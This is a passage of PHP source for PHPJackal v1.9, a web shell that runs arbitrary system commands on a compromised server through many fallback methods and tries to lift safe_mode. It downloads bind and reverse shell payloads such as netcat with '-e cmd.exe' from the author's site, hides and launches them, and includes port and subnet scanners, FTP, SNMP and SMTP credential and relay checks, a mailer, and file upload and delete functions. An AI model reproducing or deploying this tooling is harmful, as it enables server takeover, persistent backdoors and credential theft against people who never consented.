$value)$_REQUEST[$key]=stripslashes($value); } if(count($IP) && !in_array($_SERVER['REMOTE_ADDR'],$IP))die('Access denied!'); function hlinK($str=''){ $myvars=array('modE','chmoD','workingdiR','urL','cracK','imagE','namE','filE','downloaD','seC','cP','mV','rN','deL'); $ret=$_SERVER['PHP_SELF'].'?'; $new=explode('&',$str); foreach($_GET as $key => $v){ $add=1; foreach($new as $m){ $el=explode('=',$m); if($el[0]==$key)$add=0; } if($add){if(!in_array($key,$myvars))$ret.="$key=$v&";} } $ret.=$str; return $ret; } header('Cache-Control: no-cache, must-revalidate'); header('Expires: Mon, 7 Aug 1987 05:00:00 GMT'); $et=''; if(!empty($login_password)){ if(!empty($_REQUEST['fpassw'])){ if($_REQUEST['fpassw']==$login_password)setcookie('passw',md5($_REQUEST['fpassw'])); header('Location: '.hlinK()); } if(empty($_COOKIE['passw']) || $_COOKIE['passw']!=md5($login_password))die("
Password:
$et"); } if(!empty($_REQUEST['workingdiR']))chdir($_REQUEST['workingdiR']); $disablefunctions=ini_get('disable_functions'); $disablefunctions=explode(',',$disablefunctions); function checkthisporT($ip,$port,$timeout,$type=0){ if(!$type){ $scan=fsockopen($ip,$port,$n,$s,$timeout); if($scan){fclose($scan);return 1;} } elseif(function_exists('socket_set_timeout')){ $scan=fsockopen("udp://$ip",$port); if($scan){ socket_set_timeout($scan,$timeout); fwrite($scan,"\x00"); $s=time(); fread($scan,1); if((time()-$s)>=$timeout){fclose($scan);return 1;} } } return 0; } if(!function_exists('is_executable')){ function is_executable($addr){ return 0; } } if(!function_exists('file_get_contents')){ function file_get_contents($addr){ $a=fopen($addr,'r'); $tmp=fread($a,filesize($a)); fclose($a); if($a)return $tmp;else return null; } } if(!function_exists('file_put_contents')){ function file_put_contents($addr,$con){ $a=fopen($addr,'w'); if(!$a)return 0; $t=fwrite($a,$con); fclose($a); if($t)return strlen($con); return 0; } } function file_add_contentS($addr,$con){ $a=fopen($addr,'a'); if(!$a)return 0; fwrite($a,$con); fclose($a); return strlen($con); } if(!empty($_REQUEST['chmoD']) && !empty($_REQUEST['modE']))chmod($_REQUEST['chmoD'],'0'.$_REQUEST['modE']); if(!empty($_REQUEST['downloaD'])){ ob_clean(); $dl=$_REQUEST['downloaD']; $con=file_get_contents($dl); header('Content-type: application/octet-stream'); header("Content-disposition: attachment; filename=\"$dl\";"); header('Content-length: '.strlen($con)); echo $con; exit; } if(!empty($_REQUEST['imagE'])){ $img=$_REQUEST['imagE']; header('Content-type: imagE/gif'); header("Content-length: ".filesize($img)); header("Last-Modified: ".date('r',filemtime($img))); echo file_get_contents($img); exit; } if(!empty($_REQUEST['exT'])){ $ex=$_REQUEST['exT']; $e=get_extension_funcs($ex); echo ''.htmlspecialchars($ex).'Functions:
';foreach($e as $k=>$f){$i=$k+1;echo "$i)$f ";if(in_array($f,$disablefunctions))echo 'DISABLED';echo '
';} echo ''; exit; } function showsizE($size){ if($size>=1073741824)$size=round(($size/1073741824),2).' GB'; elseif($size>=1048576)$size=round(($size/1048576),2).' MB'; elseif($size>=1024)$size=round(($size/1024),2).' KB'; else $size.=' B'; return $size; } $windows=(substr((strtoupper(php_uname())),0,3)=='WIN')?1:0; $errorbox="
Error: "; $v='1.9'; $cwd=getcwd(); $msgbox="
"; $intro="
Script:
".str_repeat('-=-',25)."
Name: PHPJackal
Version: $v

Author:
".str_repeat('-=-',25)."
Name: NetJackal
Country: Iran
Website: http://netjackal.by.ru/
Email: c02.duduenconespamminsystem.net@gmail.com
$et"; $footer="${msgbox}PHPJackal v$v - Powered By NetJackal$et"; $hcwd=""; $t="
"; $crack="
Dictionary:
Dictionary type:Simple (P)Combo (U:P)
Username:
Server:
Log $hcwd $et"; function checkfunctioN($func){ global $disablefunctions,$safemode; $safe=array('passthru','system','exec','shell_exec','popen','proc_open'); if($safemode=='ON' && in_array($func,$safe))return 0; elseif(function_exists($func) && is_callable($func) && !in_array($func,$disablefunctions))return 1; return 0; } function whereistmP(){ $uploadtmp=ini_get('upload_tmp_dir'); $uf=getenv('USERPROFILE'); $af=getenv('ALLUSERSPROFILE'); $se=ini_get('session.save_path'); $envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP'); if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp'; if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp'; if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp'; if(is_dir($uf) && is_writable($uf))return $uf; if(is_dir($af) && is_writable($af))return $af; if(is_dir($se) && is_writable($se))return $se; if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp; if(is_dir($envtmp) && is_writable($envtmp))return $envtmp; return '.'; } function shelL($command){ global $windows; $exec=$output=''; $dep[]=array('pipe','r');$dep[]=array('pipe','w'); if(checkfunctioN('passthru')){ob_start();passthru($command);$exec=ob_get_contents();ob_clean();ob_end_clean();} elseif(checkfunctioN('system')){$tmp=ob_get_contents();ob_clean();system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;} elseif(checkfunctioN('exec')){exec($command,$output);$output=join("\n",$output);$exec=$output;} elseif(checkfunctioN('shell_exec'))$exec=shell_exec($command); elseif(checkfunctioN('popen')){$output=popen($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);} elseif(checkfunctioN('proc_open')){$res=proc_open($command,$dep,$pipes);while(!feof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=$output;proc_close($res);} elseif(checkfunctioN('win_shell_execute'))$exec=winshelL($command); elseif(checkfunctioN('win32_create_service'))$exec=srvshelL($command); elseif(extension_loaded('ffi') && $windows)$exec=ffishelL($command); elseif(is_object($ws=new COM('WScript.Shell')))$exec=comshelL($command,$ws); elseif(extension_loaded('perl'))$exec=perlshelL($command); return $exec; } function getiT($get){ $fo=strtolower(ini_get('allow_url_fopen')); $ui=strtolower(ini_get('allow_url_include')); if($fo || $fo=='on')$con=file_get_contents($get); elseif($ui || $ui=='on'){ ob_start(); include($get); $con=ob_get_contents(); ob_end_clean(); } else{ $u=parse_url($get); $host=$u['host'];$file=(empty($u['path']))?'/':$u['path'];$port=(empty($u['port']))?80:$u['port']; $url=fsockopen($host,$port,$en,$es,12); fputs($url,"GET $file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n"); $tmp=$con=''; while($tmp!="\r\n")$tmp=fgets($url); while(!feof($url))$con.=fgets($url); } return $con; } function downloadiT($get,$put){ $con=getiT($get); $mk=file_put_contents($put,$con); if($mk)return 1; return 0; } function winshelL($command){ $name=whereistmP()."\\".uniqid('NJ'); win_shell_execute('cmd.exe','',"/C $command >\"$name\""); sleep(1); $exec=file_get_contents($name); unlink($name); return $exec; } function ffishelL($command){ $name=whereistmP()."\\".uniqid('NJ'); $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);"); $res=$api->WinExec("cmd.exe /c $command >\"$name\"",0); while(!file_exists($name))sleep(1); $exec=file_get_contents($name); unlink($name); return $exec; } function srvshelL($command){ $name=whereistmP()."\\".uniqid('NJ'); $n=uniqid('NJ'); $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec']; win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\"")); win32_start_service($n); win32_stop_service($n); win32_delete_service($n); while(!file_exists($name))sleep(1); $exec=file_get_contents($name); unlink($name); return $exec; } function comshelL($command,$ws){ $exec=$ws->exec("cmd.exe /c $command"); $so=$exec->StdOut(); return $so->ReadAll(); } function perlshelL($command){ $perl=new perl(); ob_start(); $perl->eval("system('$command')"); $exec=ob_get_contents(); ob_end_clean(); return $exec; } function smtpchecK($addr,$user,$pass,$timeout){ $sock=fsockopen($addr,25,$n,$s,$timeout); if(!$sock)return -1; fread($sock,1024); fputs($sock,'ehlo '.uniqid('NJ')."\r\n"); $res=substr(fgets($sock,512),0,1); if($res!='2')return 0; fgets($sock,512);fgets($sock,512);fgets($sock,512); fputs($sock,"AUTH LOGIN\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='334')return 0; fputs($sock,base64_encode($user)."\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='334')return 0; fputs($sock,base64_encode($pass)."\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='235')return 0; return 1; } function mysqlchecK($host,$user,$pass,$timeout){ if(function_exists('mysql_connect')){ $l=mysql_connect($host,$user,$pass); if($l)return 1; } return 0; } function mssqlchecK($host,$user,$pass,$timeout){ if(function_exists('mssql_connect')){ $l=mssql_connect($host,$user,$pass); if($l)return 1; } return 0; } function checksmtP($host,$timeout){ $from=strtolower(uniqid('nj')).'@'.strtolower(uniqid('nj')).'.com'; $sock=fsockopen($host,25,$n,$s,$timeout); if(!$sock)return -1; $res=substr(fgets($sock,512),0,3); if($res!='220')return 0; fputs($sock,'HELO '.uniqid('NJ')."\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='250')return 0; fputs($sock,"MAIL FROM: <$from>\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='250')return 0; fputs($sock,"RCPT TO: \r\n"); $res=substr(fgets($sock,512),0,3); if($res!='250')return 0; fputs($sock,"DATA\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='354')return 0; fputs($sock,"From: ".uniqid('NJ')." ".uniqid('NJ')." <$from>\r\nSubject: ".uniqid('NJ')."\r\nMIME-Version: 1.0\r\nContent-Type: text/plain;\r\n\r\n".uniqid('Hello ',true)."\r\n.\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='250')return 0; return 1; } function replace_stR($s,$h){ $ret=$h; foreach($s as $k=>$r)$ret=str_replace($k,$r,$ret); return $ret; } function check_urL($url,$method,$search='200',$timeout=3){ $u=parse_url($url); $method=strtoupper($method); $host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';$port=(empty($u['port']))?80:$u['port']; $data=(!empty($u['query']))?$u['query']:''; if(!empty($data))$data="?$data"; $sock=fsockopen($host,$port,$en,$es,$timeout); if($sock){ fputs($sock,"$method $file$data HTTP/1.0\r\n"); fputs($sock,"Host: $host\r\n"); if($method=='GET')fputs($sock,"\r\n"); elseif($method=='POST')fputs($sock,'Content-Type: application/x-www-form-urlencoded\r\nContent-length: '.strlen($data)."\r\nAccept-Encoding: text\r\nConnection: close\r\n\r\n$data"); else return 0; if($search=='200')if(strstr(fgets($sock),'200')){fclose($sock);return 1;}else{fclose($sock);return 0;} while(!feof($sock)){ $res=fgets($sock); if(!empty($res))if(strstr($res,$search)){fclose($sock);return 1;} } fclose($sock); } return 0; } function get_sw_namE($host,$timeout){ $sock=fsockopen($host,80,$en,$es,$timeout); if($sock){ $page=uniqid('NJ'); fputs($sock,"GET /$page HTTP/1.0\r\n\r\n"); while(!feof($sock)){ $con=fgets($sock); if(strstr($con,'Server:')){$ser=substr($con,strpos($con,' ')+1);return $ser;} } fclose($sock); return -1; }return 0; } function snmpchecK($ip,$com,$timeout){ $res=0; $n=chr(0x00); $packet=chr(0x30).chr(0x26).chr(0x02).chr(0x01).chr(0x00).chr(0x04).chr(strlen($com)).$com.chr(0xA0).chr(0x19).chr(0x02).chr(0x01).chr(0x01).chr(0x02).chr(0x01).$n.chr(0x02).chr(0x01).$n.chr(0x30).chr(0x0E).chr(0x30).chr(0x0C).chr(0x06).chr(0x08).chr(0x2B).chr(0x06).chr(0x01).chr(0x02).chr(0x01).chr(0x01).chr(0x01).$n.chr(0x05).$n; $sock=fsockopen("udp://$ip",161); if(function_exists('socket_set_timeout'))socket_set_timeout($sock,$timeout); fputs($sock,$packet); socket_set_timeout($sock,$timeout); $res=fgets($sock); fclose($sock); if($res != '')return 1;else return 0; } $safemode=(ini_get('safe_mode') || strtolower(ini_get('safe_mode'))=='on')?'ON':'OFF'; if($safemode=='ON'){ini_restore('safe_mode');ini_restore('open_basedir');} function brshelL(){ global $errorbox,$windows,$et,$hcwd; $_REQUEST['C']=(isset($_REQUEST['C']))?$_REQUEST['C']:0; $addr='http://netjackal.by.ru/br'; $error="$errorbox Can not make backdoor file, go to writeable folder.$et"; $n=uniqid('NJ_'); if(!$windows)$n=".$n"; $d=whereistmP(); $name=$d.DIRECTORY_SEPARATOR.$n; $c=($_REQUEST['C'])?1:0; if(!empty($_REQUEST['port']) && ($_REQUEST['port']<=65535) && ($_REQUEST['port']>=1)){ $port=(int)$_REQUEST['port']; if($windows){ if($c){ $name.='.exe'; $bd=downloadiT("$addr/nc",$name); shelL("attrib +H $name"); if(!$bd)echo $error;else shelL("$name -L -p $port -e cmd.exe"); }else{ $name=$name.'.pl'; $bd=downloadiT("$addr/winbind.p",$name); shelL("attrib +H $name"); if(!$bd)echo $error;else shelL("perl $name $port"); } } else{ if($c){ $bd=downloadiT("$addr/bind.c",$name); if(!$bd)echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $port &"); }else{ $bd=downloadiT("$addr/bind.p",$name); if(!$bd)echo $error;else shelL("cd $d;perl $n $port &"); echo "Backdoor is waiting for you on $port.
"; } } } elseif(!empty($_REQUEST['rport']) && ($_REQUEST['rport']<=65535) && ($_REQUEST['rport']>=1) && !empty($_REQUEST['ip'])){ $ip=$_REQUEST['ip']; $port=(int)$_REQUEST['rport']; if($windows){ if($c){ $name.='.exe'; $bd=downloadiT("$addr/nc",$name); shelL("attrib +H $name"); if(!$bd)echo $error;else shelL("$name $ip $port -e cmd.exe"); }else{ $name=$name.'.pl'; $bd=downloadiT("$addr/winrc.p",$name); shelL("attrib +H $name"); if (!$bd)echo $error;else shelL("perl.exe $name $ip $port"); } } else{ if($c){ $bd=downloadiT("$addr/rc.c",$name); if(!$bd)echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $ip $port &"); }else{ $bd=downloadiT("$addr/rc.p",$name); if(!$bd)echo $error;else shelL("cd $d;perl $n $ip $port &"); } } echo 'Done!';} else{echo "
Bind shell:
Port:
Type:PERL";if($windows)echo 'EXE';else echo 'C';echo"
$hcwd$et
Reverse shell:
IP:
Port:
Type:PERL";if($windows)echo 'EXE';else echo 'C';echo"
$hcwd$et$et";}} function showimagE($img){ echo "
";} function editoR($file){ global $errorbox,$et,$hcwd,$cwd; if(is_file($file)){ if(!is_readable($file)){echo "$errorbox File is not readable$et
";} if(!is_writeable($file)){echo "$errorbox File is not writeable$et
";} $data=file_get_contents($file); echo "
$hcwd
$et
"; } else {echo "
$hcwd$et
"; } echo "$hcwd$et"; } function webshelL(){ global $windows,$hcwd,$et,$cwd; if($windows){ $alias=""; } else{ $alias=""; if(is_dir('/etc/valiases'))$alias.="";if(is_dir('/etc/vdomainaliases'))$alias.="";if(file_exists('/var/cpanel/accounting.log'))$alias.=""; if(is_dir('/var/spool/mail/'))$alias.=""; } echo "
Location:$et
Web Shell:
$hcwd
$hcwd$et
"; } function maileR(){ global $msgbox,$et,$hcwd; if(!empty($_REQUEST['subject'])&&!empty($_REQUEST['body'])&&!empty($_REQUEST['from'])&&!empty($_REQUEST['to'])){ $to=$_REQUEST['to'];$from=$_REQUEST['from'];$subject=$_REQUEST['subject'];$body=$_REQUEST['body']; if(mail($to,$subject,$body,"From: $from"))echo "$msgboxMail sent!
$et"; } echo "

Mailer:
SMTP".ini_get('SMTP').' ('.ini_get('smtp_port').")
From:$hcwd
To:
Subject:
Body:
$et"; } function scanneR(){ global $hcwd,$et; if(!empty($_SERVER['SERVER_ADDR']))$host=$_SERVER['SERVER_ADDR'];else $host='127.0.0.1'; $udp=(empty($_REQUEST['udp']))?0:1;$tcp=(empty($_REQUEST['tcp']))?0:1; if(($udp||$tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport']) && !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])){ $target=$_REQUEST['target'];$from=(int)$_REQUEST['fromport'];$to=(int)$_REQUEST['toport'];$timeout=(int)$_REQUEST['timeout'];$nu=0; echo 'Port scanning started against '.htmlspecialchars($target).':
'; $start=time(); for($i=$from;$i<=$to;$i++){ if($tcp){ if(checkthisporT($target,$i,$timeout)){ $nu++; $ser=''; if(getservbyport($i,'tcp'))$ser='('.getservbyport($i,'tcp').')'; echo "$nu) $i $ser (Connect) [TCP]
"; } } if($udp)if(checkthisporT($target,$i,$timeout,1)){$nu++;$ser='';if(getservbyport($i,'udp'))$ser='('.getservbyport($i,'udp').')';echo "$nu) $i $ser [UDP]
";} } $time=time()-$start; echo "Done! ($time seconds)
"; } elseif(!empty($_REQUEST['securityscanner'])){ echo ''; $start=time(); $from=$_REQUEST['from']; $to=(int)$_REQUEST['to']; $timeout=(int)$_REQUEST['timeout']; $f=substr($from,strrpos($from,'.')+1); $from=substr($from,0,strrpos($from,'.')); if(!empty($_REQUEST['httpscanner'])){ echo 'Loading webserver bug list...'; $buglist=whereistmP().DIRECTORY_SEPARATOR.uniqid('BL'); $dl=downloadiT('http://www.cirt.net/nikto/UPDATES/1.36/scan_database.db',$buglist); if($dl){$file=file($buglist);echo 'Done! scanning started.

';}else echo 'Failed!!! scanning started without webserver security testing...

'; }else{$fr=htmlspecialchars($from);echo "Scanning $fr.$f-$fr.$to:

";} for($i=$f;$i<=$to;$i++){ $output=0; $ip="$from.$i"; if(!empty($_REQUEST['nslookup'])){ $hn=gethostbyaddr($ip); if($hn!=$ip)echo "$ip [$hn]
"; $output=1;} if(!empty($_REQUEST['ipscanner'])){ $port=$_REQUEST['port']; if(strstr($port,','))$p=explode(',',$port);else $p[0]=$port; $open=$ser=''; foreach($p as $po){ $scan=checkthisporT($ip,$po,$timeout); if($scan){ $ser=''; if($ser=getservbyport($po,'tcp'))$ser="($ser)"; $open.=" $po$ser "; } } if($open){echo "$ip) Open ports:$open
";$output=1;} } if(!empty($_REQUEST['httpbanner'])){ $res=get_sw_namE($ip,$timeout); if($res){ echo "$ip) Webserver software: "; if($res==-1)echo 'Unknow'; else echo $res; echo '
'; $output=1; } } if(!empty($_REQUEST['httpscanner'])){ if(checkthisporT($ip,80,$timeout) && !empty($file)){ $admin=array('/admin/','/adm/'); $users=array('adm','bin','daemon','ftp','guest','listen','lp','mysql','noaccess','nobody','nobody4','nuucp','operator','root','smmsp','smtp','sshd','sys','test','unknown','uucp','web','www'); $nuke=array('/','/postnuke/','/postnuke/html/','/modules/','/phpBB/','/forum/'); $cgi=array('/cgi.cgi/','/webcgi/','/cgi-914/','/cgi-915/','/bin/','/cgi/','/mpcgi/','/cgi-bin/','/ows-bin/','/cgi-sys/','/cgi-local/','/htbin/','/cgibin/','/cgis/','/scripts/','/cgi-win/','/fcgi-bin/','/cgi-exe/','/cgi-home/','/cgi-perl/'); foreach($file as $v){ $vuln=array(); $v=trim($v); if(!$v || $v{0}=='#')continue; $v=str_replace('","','^',$v); $v=str_replace('"','',$v); $vuln=explode('^',$v); $page=$cqich=$nukech=$adminch=$userch=$vuln[1]; if(strstr($page,'@CGIDIRS')) foreach($cgi as $cg){ $cqich=str_replace('@CGIDIRS',$cg,$page); $url="http://$ip$cqich"; $res=check_urL($url,$vuln[3],$vuln[2],$timeout); if($res){$output=1;echo "$ip)".$vuln[4]." $url
";} } elseif(strstr($page,'@ADMINDIRS')) foreach($admin as $cg){ $adminch=str_replace('@ADMINDIRS',$cg,$page); $url="http://$ip$adminch"; $res=check_urL($url,$vuln[3],$vuln[2],$timeout); if($res){$output=1;echo "$ip)".$vuln[4]." $url
";} } elseif(strstr($page,'@USERS')) foreach($users as $cg){ $userch=str_replace('@USERS',$cg,$page); $url="http://$ip$userch"; $res=check_urL($url,$vuln[3],$vuln[2],$timeout); if($res){$output=1;echo "$ip)".$vuln[4]." $url
";} } elseif(strstr($page,'@NUKE')) foreach($nuke as $cg){ $nukech=str_replace('@NUKE',$cg,$page); $url="http://$ip$nukech"; $res=check_urL($url,$vuln[3],$vuln[2],$timeout); if($res){$output=1;echo "$ip)".$vuln[4]." $url
";} } else{ $url="http://$ip$page"; $res=check_urL($url,$vuln[3],$vuln[2],$timeout); if($res){$output=1;echo "$ip)".$vuln[4]." $url
";} } } } } if(!empty($_REQUEST['smtprelay'])){ if(checkthisporT($ip,25,$timeout)){ $res=''; $res=checksmtP($ip,$timeout); if($res==1){echo "$ip) SMTP relay found.
";$output=1;} } } if(!empty($_REQUEST['snmpscanner'])){ if(checkthisporT($ip,161,$timeout,1)){ $com=$_REQUEST['com']; $coms=$res=''; if(strstr($com,','))$c=explode(',',$com);else $c[0]=$com; foreach($c as $v){ $ret=snmpchecK($ip,$v,$timeout); if($ret)$coms.=" $v "; } if($coms!=''){echo "$ip) SNMP FOUND: $coms
";$output=1;} } } if(!empty($_REQUEST['ftpscanner']) && function_exists('ftp_connect')){ if(checkthisporT($ip,21,$timeout)){ $usps=explode(',',$_REQUEST['userpass']); foreach($usps as $v){ $user=substr($v,0,strpos($v,':')); $pass=substr($v,strpos($v,':')+1); if($pass=='[BLANK]')$pass=''; $ftp=ftp_connect($ip,21,$timeout); if($ftp){ if(ftp_login($ftp,$user,$pass)){$output=1;echo "$ip) FTP FOUND: ($user:$pass) System type: ".ftp_systype($ftp)." (Connect)
";} } } } } if($output)echo '
'; } $time=time()-$start; echo "Done! ($time seconds)
"; if(!empty($buglist))unlink($buglist); } elseif(!empty($_REQUEST['directoryscanner'])){ $dir=file($_REQUEST['dic']);$host=$_REQUEST['host'];$r=$_REQUEST['r1']; echo "
Scanning started...\n";
for($i=0;$i$adr\n";}
}else{
$adr="$d.$host";
$ip=gethostbyname($adr);
if($ip!=$adr){echo "Subdomain Found: $adr($ip)\n";}
}
}
echo 'Done!
'; } else{ $t="
TCPUDP":""; echo "
$t>
Port scanner:
Target:
From:
To:
Timeout:
$chbox$hcwd$et$t>Discoverer:
Host:
Dictionary:
Search for:DirectoriesSubdomains
"; $host=substr($host,0,strrpos($host,".")); echo "$t name=security>
Security scanner:
From: NS lookup
To:xxx.xxx.xxx.$hcwd
Timeout:
Port scanner:
Get web bannerWebserver security scanning   SMTP relay check
FTP password:
SNMP:
$et"; } } function sysinfO(){ global $windows,$disablefunctions,$cwd,$safemode; $t8=""; $t6=""; $mil="$osn",$os); $os=str_replace($ker,"${mil}Linux+Kernel'>$ker",$os); $inpa=':'; }else{ $sam=$sysroot."\\system32\\config\\SAM"; $inpa=';'; $os=str_replace($osn,"${mil}MS+Windows'>$osn",$os); } $cuser=get_current_user(); if(!$cuser)$cuser='Unknow'; $software=str_replace('Apache',"${mil}Apache'>Apache",$_SERVER['SERVER_SOFTWARE']); echo "${t6}Server:${t8}Operation system:${t6}Web server application:${t8}CPU:${t6}Disk status:${t8}User domain:${t6}User name:"; if($windows){ echo "${t8}Windows directory:${t6}Sam file:'; } else { echo "${t8}UID - GID:${t6}Recommended local root exploits:${t8}Passwd file:${t6}${mil}cpanel'>cPanel:'; } echo "$t8${mil}PHP'>PHP version:${t6}Zend version:${t8}Include path:${t6}PHP Modules:${t8}Disabled functions:${t6}Safe mode:${t8}Open base dir:${t6}DBMS:
Server information:
".$_SERVER['HTTP_HOST'];if(!empty($_SERVER["SERVER_ADDR"])){ echo "(". $_SERVER["SERVER_ADDR"] .")";}echo "
$os$osver
$software
$CPU
$disksize
";if (!empty($_SERVER['USERDOMAIN'])) echo $_SERVER['USERDOMAIN'];else echo "Unknow"; echo "
$cuser
$sysroot
";if(is_readable(($sam)))echo "Readable"; else echo 'Not readable';echo '
".getmyuid().' - '.getmygid()."
$xpl
"; if(is_readable('/etc/passwd'))echo "Readable";else echo'Not readable';echo "
";$cp='/usr/local/cpanel/version';$cv=(file_exists($cp) && is_writable($cp))?trim(file_get_contents($cp)):'Unknow';echo "$cv (Log file: "; if(file_exists('/var/cpanel/accounting.log')){if(is_readable('/var/cpanel/accounting.log'))echo "Readable";else echo 'Not readable';}else echo 'Not found';echo ')
".PHP_VERSION." (more...)
";if (function_exists('zend_version')) echo "".zend_version().'';else echo 'Not Found';echo "
".str_replace($inpa,' ',DEFAULT_INCLUDE_PATH)."
";$ext=get_loaded_extensions();foreach($ext as $v){$i=phpversion($v);if(!empty($i))$i="($i)";$l=hlinK("exT=$v");echo "$v $i ";}echo "
";if(!empty($ds))echo "$ds ";else echo 'Nothing'; echo"
$safemode
$basedir
";$sq='';if(function_exists('mysql_connect')) $sq= "${mil}MySQL'>MySQL ";if(function_exists('mssql_connect')) $sq.= " ${mil}MSSQL'>MSSQL ";if(function_exists('ora_logon')) $sq.= " ${mil}Oracle'>Oracle ";if(function_exists('sqlite_open')) $sq.= ' SQLite ';if(function_exists('pg_connect')) $sq.= " ${mil}PostgreSQL'>PostgreSQL ";if(function_exists('msql_connect')) $sq.= ' mSQL ';if(function_exists('mysqli_connect'))$sq.= ' MySQLi ';if(function_exists('ovrimos_connect')) $sq.= ' Ovrimos SQL ';if ($sq=='') $sq= 'Nothing'; echo "$sq
"; } function checksuM($file){ global $et; echo "
MD5: ".md5_file($file).'
SHA1:'.sha1_file($file)."$et"; } function listdiR($cwd,$task){ $c=getcwd(); $dh=opendir($cwd); while($cont=readdir($dh)){ if($cont=='.' || $cont=='..')continue; $adr=$cwd.DIRECTORY_SEPARATOR.$cont; switch($task){ case '0':if(is_file($adr))echo "[$adr]\n";if(is_dir($adr))echo "[$adr]\n";break; case '1':if(is_writeable($adr)){if(is_file($adr))echo "[$adr]\n";if(is_dir($adr))echo "[$adr]\n";}break; case '2':if(is_file($adr) && is_writeable($adr))echo "[$adr]\n";break; case '3':if(is_dir($adr) && is_writeable($adr))echo "[$adr]\n";break; case '4':if(is_file($adr))echo "[$adr]\n";break; case '5':if(is_dir($adr))echo "[$adr]\n";break; case '6':if(preg_match('@'.$_REQUEST['search'].'@',$cont) || (is_file($adr) && preg_match('@'.$_REQUEST['search'].'@',file_get_contents($adr)))){if(is_file($adr))echo "[$adr]\n";if(is_dir($adr))echo "[$adr]\n";}break; case '7':if(strstr($cont,$_REQUEST['search']) || (is_file($adr) && strstr(file_get_contents($adr),$_REQUEST['search']))){if(is_file($adr))echo "[$adr]\n";if(is_dir($adr))echo "[$adr]\n";}break; case '8':{if(is_dir($adr))rmdir($adr);else unlink($adr);rmdir($cwd);break;} } if(is_dir($adr))listdiR($adr,$task); } } if(!checkfunctioN('posix_getpwuid')){function posix_getpwuid($u){return 0;}} if(!checkfunctioN('posix_getgrgid')){function posix_getgrgid($g){return 0;}} function filemanageR(){ global $windows,$msgbox,$errorbox,$t,$et,$cwd,$hcwd; $table=""; $td1n="
"; $td2m=""; $td1i=""; $td2i=""; $tdnr=""; $tdw=""; if(!empty($_REQUEST['task'])){ if(!empty($_REQUEST['search']))$_REQUEST['task']=7; if(!empty($_REQUEST['re']))$_REQUEST['task']=6; echo '
';
listdiR($cwd,$_REQUEST['task']);
echo '
'; }else{ if(!empty($_REQUEST['cP']) || !empty($_REQUEST['mV']) || !empty($_REQUEST['rN'])){ if(!empty($_REQUEST['cP']) || !empty($_REQUEST['mV'])){ $title='Destination'; $ad=(!empty($_REQUEST['cP']))?$_REQUEST['cP']:$_REQUEST['mV']; $dis=(!empty($_REQUEST['cP']))?'Copy':'Move'; }else{ $ad=$_REQUEST['rN']; $title='New name'; $dis='Rename'; } if(!!empty($_REQUEST['deS'])){ echo "
$td1n$td2m$hcwd$et"; }else{ if(!empty($_REQUEST['rN']))rename($ad,$_REQUEST['deS']); else{ copy($ad,$_REQUEST['deS']); if(!empty($_REQUEST['mV']))unlink($ad); } } } if(!empty($_REQUEST['deL'])){if(is_dir($_REQUEST['deL']))listdiR($_REQUEST['deL'],8);else unlink($_REQUEST['deL']);} if(!empty($_FILES['uploadfile'])){ move_uploaded_file($_FILES['uploadfile']['tmp_name'],$_FILES['uploadfile']['name']); echo "$msgboxUploaded! File name: ".$_FILES['uploadfile']['name']." File size: ".$_FILES['uploadfile']['size']. "$et
"; } $select="
$title:
[ - ] Location:$et"; $file=$dir=$link=array(); if($dirhandle=opendir($cwd)){ while($cont=readdir($dirhandle)){ if(is_dir($cwd.DIRECTORY_SEPARATOR.$cont))$dir[]=$cont; elseif(is_file($cwd.DIRECTORY_SEPARATOR.$cont))$file[]=$cont; else $link[]=$cont; } closedir($dirhandle); sort($file);sort($dir);sort($link); echo "
"; $i=0; foreach($dir as $dn){ echo ''; $i++; $own='Unknow'; $owner=posix_getpwuid(fileowner($dn)); $mdate=date('Y/m/d H:i:s',filemtime($dn)); $adate=date('Y/m/d H:i:s',fileatime($dn)); $diraction=$select.hlinK('seC=fm&workingdiR='.realpath($dn))."'>Open"; if($owner)$own="".$owner['name'].''; if(($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;} if(is_writeable($dn))echo $tdw;elseif(!is_readable($dn))echo $tdnr;else echo $cl2; echo ""; if(strlen($dn)>45)echo substr($dn,0,42).'...';else echo $dn;echo ''; echo $cl1."$own"; echo $cl1."$mdate"; echo $cl1."$adate"; echo "$cl1";echo "";echo 'D';if(is_readable($dn))echo 'R';if(is_writeable($dn))echo 'W';echo ''; echo "$cl1------"; echo $cl2.$diraction; echo ''; } foreach($file as $fn){ echo ''; $i++; $own='Unknow'; $owner=posix_getpwuid(fileowner($fn)); $fileaction=$select.hlinK("seC=openit&namE=$fn&workingdiR=$cwd")."'>Open"; $mdate=date('Y/m/d H:i:s',filemtime($fn)); $adate=date('Y/m/d H:i:s',fileatime($fn)); if($owner)$own="".$owner['name'].''; $size=showsizE(filesize($fn)); if(($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;} if(is_writeable($fn))echo $tdw;elseif(!is_readable($fn))echo $tdnr;else echo $cl2; echo 